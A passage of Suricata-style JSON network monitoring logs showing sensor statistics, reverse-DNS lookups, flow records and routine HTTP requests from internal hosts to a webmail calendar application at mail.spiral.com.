{"timestamp":"2020-02-29T00:10:45.000222+0000","event_type":"stats","stats":{"uptime":14297,"capture":{"kernel_packets":134462,"kernel_drops":0},"decoder":{"pkts":134466,"bytes":92818316,"invalid":185,"ipv4":132985,"ipv6":8,"ethernet":134466,"raw":0,"null":0,"sll":0,"tcp":127769,"udp":5016,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2739,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2755,"synack":2746,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1780,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2290,"failed_udp":110},"tx":{"http":4586,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2369}},"flow_mgr":{"closed_pruned":2722,"new_pruned":15,"est_pruned":2346,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":96926,"memcap":0}}} {"timestamp":"2020-02-29T00:10:47.986535+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34790,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6627},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":31913,"tx_id":0}} {"timestamp":"2020-02-29T00:10:47.995571+0000","flow_id":1084958869762291,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49707,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":42796,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:48.103585+0000","flow_id":1084958869762291,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49707,"proto":"UDP","dns":{"type":"answer","id":42796,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:48.103585+0000","flow_id":1084958869762291,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49707,"proto":"UDP","dns":{"type":"answer","id":42796,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:48.617584+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24339}} {"timestamp":"2020-02-29T00:10:48.895655+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34790,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24339},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:10:48.905698+0000","flow_id":1715253910491618,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38186,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49899,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:49.013601+0000","flow_id":1715253910491618,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38186,"proto":"UDP","dns":{"type":"answer","id":49899,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:49.013601+0000","flow_id":1715253910491618,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38186,"proto":"UDP","dns":{"type":"answer","id":49899,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:49.043840+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629}} {"timestamp":"2020-02-29T00:10:49.043840+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":2}} {"timestamp":"2020-02-29T00:10:49.089696+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34790,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1644,"tx_id":2}} {"timestamp":"2020-02-29T00:10:49.100195+0000","flow_id":1940791233185635,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40899,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29779,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:49.208618+0000","flow_id":1940791233185635,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40899,"proto":"UDP","dns":{"type":"answer","id":29779,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:49.208618+0000","flow_id":1940791233185635,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40899,"proto":"UDP","dns":{"type":"answer","id":29779,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:49.242543+0000","flow_id":1095949691237231,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46147,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58843,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:49.351235+0000","flow_id":1095949691237231,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46147,"proto":"UDP","dns":{"type":"answer","id":58843,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:49.351235+0000","flow_id":1095949691237231,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46147,"proto":"UDP","dns":{"type":"answer","id":58843,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:49.382937+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608}} {"timestamp":"2020-02-29T00:10:49.382937+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":3}} {"timestamp":"2020-02-29T00:10:49.386643+0000","flow_id":1058609245547071,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34792,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:10:49.386643+0000","flow_id":1058609245547071,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34792,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:10:52.000233+0000","event_type":"stats","stats":{"uptime":14304,"capture":{"kernel_packets":134540,"kernel_drops":0},"decoder":{"pkts":134548,"bytes":92861724,"invalid":185,"ipv4":133067,"ipv6":8,"ethernet":134548,"raw":0,"null":0,"sll":0,"tcp":127839,"udp":5028,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2741,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2757,"synack":2748,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1782,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2295,"failed_udp":111},"tx":{"http":4591,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2374}},"flow_mgr":{"closed_pruned":2722,"new_pruned":15,"est_pruned":2347,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":4,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20169,"memcap_state":0,"memcap_global":0},"http":{"memuse":123454,"memcap":0}}} {"timestamp":"2020-02-29T00:10:53.000434+0000","flow_id":2021948915723464,"event_type":"flow","src_ip":"192.168.10.122","src_port":38270,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:52.601288+0000","end":"2020-02-29T00:05:52.710276+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:54.387743+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34790,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1396,"tx_id":3}} {"timestamp":"2020-02-29T00:10:54.388545+0000","flow_id":1058609245547071,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34792,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:10:55.000722+0000","flow_id":1388849276691051,"event_type":"flow","src_ip":"192.168.10.81","src_port":52712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":16,"bytes_toserver":1776,"bytes_toclient":15021,"start":"2020-02-29T00:09:44.631403+0000","end":"2020-02-29T00:09:54.266905+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:57.000554+0000","flow_id":787811538317011,"event_type":"flow","src_ip":"192.168.10.122","src_port":36067,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:56.863955+0000","end":"2020-02-29T00:05:56.972258+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:57.000755+0000","flow_id":1544546121178258,"event_type":"flow","src_ip":"192.168.10.122","src_port":59017,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:56.679058+0000","end":"2020-02-29T00:05:56.787069+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:58.000714+0000","flow_id":1083094850400979,"event_type":"flow","src_ip":"192.168.10.130","src_port":34782,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1161,"bytes_toclient":6515,"start":"2020-02-29T00:09:52.520915+0000","end":"2020-02-29T00:09:57.718896+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:59.000187+0000","event_type":"stats","stats":{"uptime":14311,"capture":{"kernel_packets":134554,"kernel_drops":0},"decoder":{"pkts":134554,"bytes":92862120,"invalid":185,"ipv4":133073,"ipv6":8,"ethernet":134554,"raw":0,"null":0,"sll":0,"tcp":127845,"udp":5028,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093888},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2741,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2757,"synack":2748,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1782,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2295,"failed_udp":111},"tx":{"http":4591,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2374}},"flow_mgr":{"closed_pruned":2723,"new_pruned":15,"est_pruned":2348,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19179,"memcap_state":0,"memcap_global":0},"http":{"memuse":45095,"memcap":0}}} {"timestamp":"2020-02-29T00:11:06.000234+0000","event_type":"stats","stats":{"uptime":14318,"capture":{"kernel_packets":134554,"kernel_drops":0},"decoder":{"pkts":134554,"bytes":92862120,"invalid":185,"ipv4":133073,"ipv6":8,"ethernet":134554,"raw":0,"null":0,"sll":0,"tcp":127845,"udp":5028,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2741,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2757,"synack":2748,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1782,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2295,"failed_udp":111},"tx":{"http":4591,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2374}},"flow_mgr":{"closed_pruned":2724,"new_pruned":15,"est_pruned":2350,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19179,"memcap_state":0,"memcap_global":0},"http":{"memuse":45095,"memcap":0}}} {"timestamp":"2020-02-29T00:11:13.000300+0000","event_type":"stats","stats":{"uptime":14325,"capture":{"kernel_packets":134554,"kernel_drops":0},"decoder":{"pkts":134554,"bytes":92862120,"invalid":185,"ipv4":133073,"ipv6":8,"ethernet":134554,"raw":0,"null":0,"sll":0,"tcp":127845,"udp":5028,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2741,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2757,"synack":2748,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1782,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2295,"failed_udp":111},"tx":{"http":4591,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2374}},"flow_mgr":{"closed_pruned":2724,"new_pruned":15,"est_pruned":2350,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19179,"memcap_state":0,"memcap_global":0},"http":{"memuse":45095,"memcap":0}}} {"timestamp":"2020-02-29T00:11:13.001675+0000","flow_id":922471664245492,"event_type":"flow","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":12,"bytes_toserver":2881,"bytes_toclient":6890,"start":"2020-02-29T00:10:04.252660+0000","end":"2020-02-29T00:10:12.397842+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:13.403835+0000","flow_id":480231771154811,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34716,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60620,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:13.512776+0000","flow_id":480231771154811,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34716,"proto":"UDP","dns":{"type":"answer","id":60620,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:13.512776+0000","flow_id":480231771154811,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34716,"proto":"UDP","dns":{"type":"answer","id":60620,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:13.675680+0000","flow_id":1587654728744039,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7917}} {"timestamp":"2020-02-29T00:11:17.000266+0000","flow_id":1979596258201268,"event_type":"flow","src_ip":"192.168.10.130","src_port":34780,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1293,"bytes_toclient":8017,"start":"2020-02-29T00:09:40.904884+0000","end":"2020-02-29T00:10:16.599822+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:18.677072+0000","flow_id":1587654728744039,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52718,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7917},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":44800,"tx_id":0}} {"timestamp":"2020-02-29T00:11:18.863063+0000","flow_id":1941895041657687,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54337,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":42665,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:18.971428+0000","flow_id":1941895041657687,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54337,"proto":"UDP","dns":{"type":"answer","id":42665,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:18.971428+0000","flow_id":1941895041657687,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54337,"proto":"UDP","dns":{"type":"answer","id":42665,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 